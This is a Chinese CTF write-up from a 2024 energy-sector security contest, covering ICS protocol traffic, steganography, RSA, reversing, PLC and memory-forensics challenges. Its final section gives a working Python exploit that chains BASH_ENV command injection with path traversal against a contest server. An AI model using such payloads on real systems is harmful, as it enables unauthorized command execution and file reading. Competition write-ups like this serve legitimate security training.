2024中国能源网络安全大赛-①初赛
Modbus-A
tshark -r a.pcapng -T fields -e modbus.regval_uint16 | sed '/^\s*$/d' > modbus.data.txt
Cyberchef From decimal
seeyouagain
fixpng然后得到 flag@abc
foremost提取zip文件. 解压 ,base64隐写
easysys
解完不对..驱动调试结果正常。 原因是中间有花指令。
.text:0000000140001000 push rbp
.text:0000000140001001 call $+5 ; 花指令 直接+5到 100E的位置。种子是 0x91D
.text:0000000140001006 pop rbp
.text:0000000140001007 add rbp, 8
.text:000000014000100B push rbp
.text:000000014000100C retn
.text:000000014000100C ; ---------------------------------------------------------------------------
.text:000000014000100D db 0E8h
.text:000000014000100E ; ---------------------------------------------------------------------------
.text:000000014000100E pop rbp
.text:000000014000100F mov dword ptr [rsp+2Ch], 91Dh
.text:0000000140001017 retn
from ctypes import *
cdll.msvcrt.srand(0x1BF52) # 实际是0x91d
"""
for ( i = 0; i < 36; ++i )
{
if ( i == 8 || i == 13 || i == 18 || i == 23 )
{
*(_BYTE *)(a1 + i) = 45;
}
else
{
v3 = rand() % 16;
strcpy(v4, "0123456789abcdef");
*(_BYTE *)(a1 + i) = v4[v3];
}
}
"""
def rand_win():
return cdll.msvcrt.rand()
lst = [0] * 36
for i in range(36):
if ( i == 8 or i == 13 or i == 18 or i == 23 ):
lst[i] = 45
else:
v3 = rand_win() % 16
v4= "0123456789abcdef"
lst[i] = ord(v4[v3])
print(bytearray(lst))
# flag{989aeeb9-c0ea-1827-1849-db007f2540ee} 完全不对
直接 加载驱动 debug view调试
flag{97e45a19-624d-3c47-bc17-57f1c3bcbb26}
Goose
流量过滤
goose.allData == 4
提取最后一位
84 86 112 88 82 48 78 97 77 122 78 78 84 108 74 72 83 48 53 75 86 69 99 48 78 69 82 78 84 85 112 87 84 85 49 90 82 69 100 79 87 108 82 72 83 106 90 82 80 84 48 57 80 81 61 61
转码+base64
flag{cbe5378615c03732}
IP找不到了
根据提示 双网卡,分析包
过滤最大HTTP包/diag.htm 追踪流
【2nd IP-Addr: 172.16.129.0】
flag{172.16.129.0}
Fins协议分析
分析题干omron请求包
46494e530000001b000000020000000080000200 64 00 00 fc 00 40 0102 31 00 00 00 00 01 01
64 fc:server - client
40 serviceID
0102为[write code]
31.....0101 area.number
根据已知流量 write code 回复为 0000
构造回复包
flag{46494e53000000160000000200000000c0000200fc000064004001020000}
结构化数据分类分级识别-A
数据筛选清洗得到
md5加密得到flag
找到钥匙
jpg用010 Editor打开找到n , e
foremost找到flag.enc == c
import gmpy2
from Crypto.Util.number import bytes_to_long, long_to_bytes
h = bytes.fromhex('115F379D944F55823043AA824FF13F51BA73E632B4F93BE44A0C467FE51B25B4')
c = bytes_to_long(h)
n = 0x80C23546F66C490FAB718322666B3AD9C5D31C4D4BDA4C1D783FC73FB4115253
# yafu ***factors found**
p = 336864880216429367305541498622715085359
q = 172885878211796787522220685199694830877
e = 65537
assert n == p * q
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)
t = gmpy2.gcd(e, phi)
m = pow(c,d,n)
print(long_to_bytes(m))
# flag{ed22321e9ae1ca8}
PLC
手动计算 --
手动计算。(5678 & 7896) << 3 = 45120 转 INT = -20416 解密时使用 20416
# python
print(np.array(45120).astype('int16'))
# c
printf("%d", (short)45120); // -20416
仿真方式 --
安装施耐德 Unity Pro XL 8 ,仿真..运行...得到 -20416..
https://www.sojson.com/encrypt_rc4.html 解密 rc4.得到flag
U2FsdGVkX196pWxlPoR49+G/eJXJcKqLOruhqNiHzQ==
flag{uddi40lkg}
PLC 中 WORD与INT的取值范围: W#16#0000~~~W#16#FFFF
十进制:
WORD:0-65535。
INT:-32768—+32767。
decproj
冰蝎流量解密。密钥是 123456的md5值 e10adc3949ba59ab
Challenge1_enc.bak
Challenge1_enc.dvb
Challenge1_enc.dvl
Challenge1_enc.ecam
Challenge1_enc.eiptag
Challenge1_enc.etg
Challenge1_enc.ini
Challenge1_enc.inivals
Challenge1_enc.isp
Challenge1_enc.opcuatag
Challenge1_enc.pnt
Challenge1_enc.SRbitExistedInProg
2919号包提取到组态工程。 https://wwi.lanzoup.com/ilal01wlpu1g
信息搜集拿到 台达PLC软件 ISPSoft。打开后想办法获取工程密码。找不到,不会了。直接逆向。拿到 d3ltaplc 。按说明提交flag
browser
R-Studio或直接搜索PK提取出flag.zip 或者 vol filescan里有个叫 key 的文件。其实就是flag.zip。
https://www.cnblogs.com/Arthurian/p/13830381.html 默认浏览器在 Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
volatility -f browser.raw --profile=Win7SP1x64 printkey -K "Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice"> kkk.txt
Values:
REG_SZ Progid : (S) Tor-Browser-v2.51
密码为 Tor-Browser-v2.51
flag{e3ed8aa2-68d4-4cc8-a664-1f3fd8136325}
testjava
直接看这个吧 https://mp.weixin.qq.com/s/PC7oYeLmMgxLWmawRQAF4g
easy_re-A
UPX魔改了。不会恢复。直接Attach。(看有人直接用 Cyberchef异或爆破的)
关键比较
00007FF761DF10C9 | 8B4424 20 | mov eax,dword ptr ss:[rsp+20] | rsp+20 counter
00007FF761DF10CD | FFC0 | inc eax |
00007FF761DF10CF | 894424 20 | mov dword ptr ss:[rsp+20],eax |
00007FF761DF10D3 | 837C24 20 26 | cmp dword ptr ss:[rsp+20],26 | 26:'&'
00007FF761DF10D8 | 7D 25 | jge easy_iot.upx.7FF761DF10FF |
00007FF761DF10DA | 48:634424 20 | movsxd rax,dword ptr ss:[rsp+20] |
00007FF761DF10DF | 48:8D0D 1AAF0100 | lea rcx,qword ptr ds:[7FF761E0C000] | 保存着密文
00007FF761DF10E6 | 0FB60401 | movzx eax,byte ptr ds:[rcx+rax] |
00007FF761DF10EA | 48:634C24 20 | movsxd rcx,dword ptr ss:[rsp+20] |
00007FF761DF10EF | 0FB64C0C 30 | movzx ecx,byte ptr ss:[rsp+rcx+30] |
00007FF761DF10F4 | 83F1 62 | xor ecx,62 | 异或 0x62
00007FF761DF10F7 | 3BC1 | cmp eax,ecx |
00007FF761DF10F9 | 74 02 | je easy_iot.upx.7FF761DF10FD |
00007FF761DF10FB | EB 02 | jmp easy_iot.upx.7FF761DF10FF |
00007FF761DF10FD | EB CA | jmp <easy_iot.upx.ii> |
a = bytes.fromhex('04 0E 03 05 19 26 50 53 51 23 52 20 56 21 27 54 56 55 52 56 51 57 51 21 57 56 55 54 52 20 24 24 55 5A 57 26 5B 1F ')
for c in a:
print(chr(0x62 ^ c), end='')
Gohttp
https://mp.weixin.qq.com/s/wOddOgJLRdyqK2d2LmV8Hw
import requests
def encode(text):
from urllib.parse import quote
string_to_encode = text
return quote(string_to_encode)
data = encode('cat /home/ctf/flag')
response = requests.get(f"http://101.230.70.253:25875/syncData?ApiUrl=PATH%3a%3aBASH_ENV%3d'$({data}>+/tmp/3.txt)'")
print(response.text)
res = requests.get('http://101.230.70.253:25875/?tpl=../../../../../tmp/3.txt')
print(res.text)
